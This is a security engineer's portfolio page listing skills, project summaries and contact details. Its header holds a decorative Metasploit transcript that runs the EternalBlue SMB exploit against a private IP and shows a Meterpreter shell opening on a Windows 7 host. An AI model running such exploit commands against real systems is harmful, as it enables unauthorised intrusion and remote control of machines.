IT Professional • Security Engineer • Web App Developer

Building secure, high-performance digital platforms with zero-trust mindset.

I design resilient infrastructure, harden applications, and build full-stack web products that scale safely.

See Projects Let's Collaborate

6+Years in IT
40%Avg. attack surface reduced
99.95%App uptime maintained

Security Ops Snapshot

msf6 > use exploit/windows/smb/ms17_010_eternalblue

msf6 exploit(eternalblue) > set RHOSTS 10.10.14.8

RHOSTS => 10.10.14.8

msf6 exploit(eternalblue) > set LHOST 10.10.16.5

LHOST => 10.10.16.5

msf6 exploit(eternalblue) > run

[*] 10.10.14.8:445 - Connecting to target...

[*] 10.10.14.8:445 - Connection established for exploitation.

[+] 10.10.14.8:445 - Target OS selected valid for OS indicated by SMB reply

[*] 10.10.14.8:445 - CORE raw buffer dump (53 bytes)

[+] 10.10.14.8:445 - ETERNALBLUE overwrite completed successfully!

[*] Sending stage (200774 bytes) to 10.10.14.8

[*] Meterpreter session 1 opened at 2026-02-16 09:14:33

meterpreter > sysinfo

Computer : WIN-TARGET

OS : Windows 7 (6.1 Build 7601, SP 1)

Domain : WORKGROUP

meterpreter > _

About Me

Hi, I'm Wilfred

I'm an IT professional who lives at the intersection of cybersecurity and web engineering. I harden cloud infrastructure, architect secure applications, and build full-stack products that scale safely — always with a zero-trust mindset.

6+ years hardening production systems
40% avg. attack-surface reduction
3 industry certifications

Security Engineering

Threat modeling, pen-test coordination, SIEM tuning, and incident-response playbooks across cloud-native environments.

Web Development

React & Node stacks, API hardening, and CI/CD security — bridging product velocity with enterprise-grade protection.

My Philosophy

Shift-left security, automated testing, and observability-driven engineering behind every deployment.

Security Operations

SIEM management, SOC automation & threat hunting

Cloud & Infrastructure

AWS/Azure hardening, Kubernetes & IaC security

Application Security

Secure SDLC, SAST/DAST, dependency audits

Full-Stack Development

Production web apps with built-in security controls

Core Capabilities

Technical depth across security and engineering — here's what I bring to every engagement.

Security & Defence

Cloud Security

AWS & Azure hardening, IAM policies, and cloud-native threat detection

Penetration Testing

Web app & network pen-test coordination, vulnerability assessment

SIEM & Threat Detection

Log aggregation, alert tuning, and real-time incident triage

AWS GuardDuty Splunk Burp Suite Nessus Zero Trust

Engineering & Development

Secure SDLC

Shift-left security, SAST/DAST integration, and code review

JavaScript / TypeScript

Modern front-end frameworks, strong typing, and build tooling

Node.js & APIs

RESTful & GraphQL services, auth flows, and API hardening

React Node.js CI/CD Docker Kubernetes Terraform

Featured Work

Real-world engagements where security met execution — delivering measurable results.

View All Projects →

01 Identity & Access

Zero-Trust Access Portal

Built an MFA-enforced SSO gateway with behavior analytics and adaptive risk scoring for a distributed workforce.

63% fewer account takeovers

OIDC conditional access

Live Demo

02 Application Security

Secure E-Commerce Platform

Delivered a hardened web app architecture with tokenized payment flows, WAF controls, and automated dependency scanning.

PCI audit passed

27% faster checkout

Live Demo

03 Threat Intelligence

Threat Monitoring Dashboard

Created a real-time incident visibility console aggregating logs from cloud, endpoint, and network sensors.

45% faster detection

1-click SOC triage

Live Demo

Get In Touch

Have a project in mind or want to collaborate? Reach out through any channel.

wilfredmutai@outlook.com

Location

Nairobi, Kenya

Availability

Open to freelance & full-time

Find me online

Systems Secure